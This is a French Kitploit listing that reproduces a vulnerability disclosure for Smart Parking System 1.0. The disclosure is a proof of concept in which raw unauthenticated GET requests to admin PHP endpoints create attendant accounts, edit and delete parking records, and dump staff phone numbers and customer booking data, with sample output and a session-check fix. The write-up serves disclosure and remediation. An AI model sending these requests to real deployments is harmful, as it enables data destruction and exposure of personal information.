Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10243-AUTH — Preuve de concept démontrant un accès non authentifié aux fonctions d'administration critiques dans Smart Parking System 1.0, permettant la création de comptes, la manipulation de données et l'exposition de données personnelles (PII). | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-10243-auth
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Preuve de concept démontrant un accès non authentifié aux fonctions d'administration critiques dans Smart Parking System 1.0, permettant la création de comptes, la manipulation de données et l'exposition de données personnelles (PII).

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Smart Parking System 1.0 - Accès non authentifié aux fonctions administratives critiques

Informations sur la vulnérabilité

ChampDétails
ProduitSmart Parking System
Vendeurcode-projects.org
Version1.0
Classe de vulnérabilitéAuthentification manquante pour une fonction critique (CWE-306)
ID CVEEn attente
Score CVSS9.8 Critique (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Authentification requiseAucune
Fichiers concernésattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Description

Le Smart Parking System 1.0 de code-projects.org ne parvient pas à imposer l'authentification sur plusieurs points de terminaison réservés aux administrateurs. Un attaquant distant non authentifié peut accéder directement à ces points de terminaison sans cookie de session et effectuer des opérations privilégiées, notamment créer des comptes de préposés, modifier et supprimer des enregistrements de stationnement, et consulter toutes les données personnelles des clients et les données de réservation.

Aucun identifiant, aucun jeton de session et aucune interaction d'un utilisateur légitime ne sont requis pour exploiter cette vulnérabilité.


Vue d'ensemble de la chaîne d'attaque

root@kitploit:~
Aucun identifiant / aucune session
        ↓
Requête GET directe vers les points de terminaison admin
        ↓
attendant.php     → créer des comptes de préposés frauduleux
edit.php          → lire et écraser tout enregistrement de stationnement
basic_table.php   → supprimer tout enregistrement de stationnement
basic_table2.php  → extraire toutes les données personnelles des préposés
admin_request.php → extraire tous les e-mails clients et les données de réservation
        ↓
Fonctionnalité admin complète compromise

Preuve de concept étape par étape

Étape 1 — Confirmer l'état non authentifié

Ouvrez une nouvelle session de navigateur sans cookies. Accédez à la racine de l'application. La page de connexion s'affiche, confirmant qu'aucune session active n'existe :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Étape 2 — Accéder au panneau de création de préposés (sans authentification)

Accédez directement au point de terminaison d'enregistrement des préposés :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Résultat : Le formulaire complet « Add Parking Attendant Details » se charge avec des champs pour le prénom, le nom, le numéro de mobile, la rue, le nom d'utilisateur et le mot de passe. Un attaquant peut enregistrer un compte de préposé frauduleux avec accès au système.


Étape 3 — Lire et modifier les enregistrements de stationnement (sans authentification)

Accédez directement au point de terminaison de modification des enregistrements de stationnement :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Résultat : Le formulaire « Update Parkings Details » se charge pré-rempli avec les valeurs en direct de la base de données :

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Un attaquant peut écraser n'importe quel champ et soumettre pour enregistrer directement les modifications dans la base de données.


Étape 4 — Supprimer un enregistrement de stationnement (sans authentification)

Envoyez une requête GET directe au point de terminaison de suppression :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Résultat : L'application répond avec :

root@kitploit:~
Parking deleted successfully

L'enregistrement est définitivement détruit dans la base de données. Aucune authentification, aucun jeton CSRF et aucune invite de confirmation requis.


Étape 5 — Extraire tous les préposés au stationnement (sans authentification)

Accédez directement au point de terminaison de liste des préposés :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Résultat : La liste complète des préposés est renvoyée, y compris les noms, les numéros de mobile et les rues assignées :

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Étape 6 — Extraire toutes les données de réservation clients (sans authentification)

Accédez directement au point de terminaison des demandes de réservation admin :

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Résultat : Tous les enregistrements de réservation clients sont renvoyés, y compris les e-mails, les places, les heures et les coûts :

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Impact

  • Accès complet au panneau admin — toutes les fonctionnalités privilégiées accessibles sans aucun identifiant
  • Destruction de données — tout enregistrement de stationnement peut être supprimé définitivement
  • Manipulation de données — tout enregistrement de stationnement peut être modifié
  • Élévation de privilèges — des comptes de préposés frauduleux peuvent être créés avec connexion au système
  • Exposition de données personnelles — tous les e-mails clients et l'historique de réservation sont collectés
  • Fuite de données des préposés — liste complète incluant noms et numéros de téléphone exposée

Résumé des fichiers concernés

FichierVulnérabilité
attendant.phpCréation de comptes de préposés non authentifiée
edit.phpAccès en lecture/écriture non authentifié aux enregistrements de stationnement
basic_table.phpSuppression non authentifiée des enregistrements de stationnement
basic_table2.phpAccès non authentifié à toutes les données personnelles des préposés
admin_request.phpAccès non authentifié à toutes les données de réservation clients

Remédiation

Ajoutez une vérification d'authentification de session en haut de chaque fichier PHP orienté admin :

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Références

  • Page d'accueil du vendeur
  • CWE-306 : Authentification manquante pour une fonction critique
  • OWASP : Contrôle d'accès cassé

Découvreur

  • Chercheur : Imad Alvi
Télécharger l’outil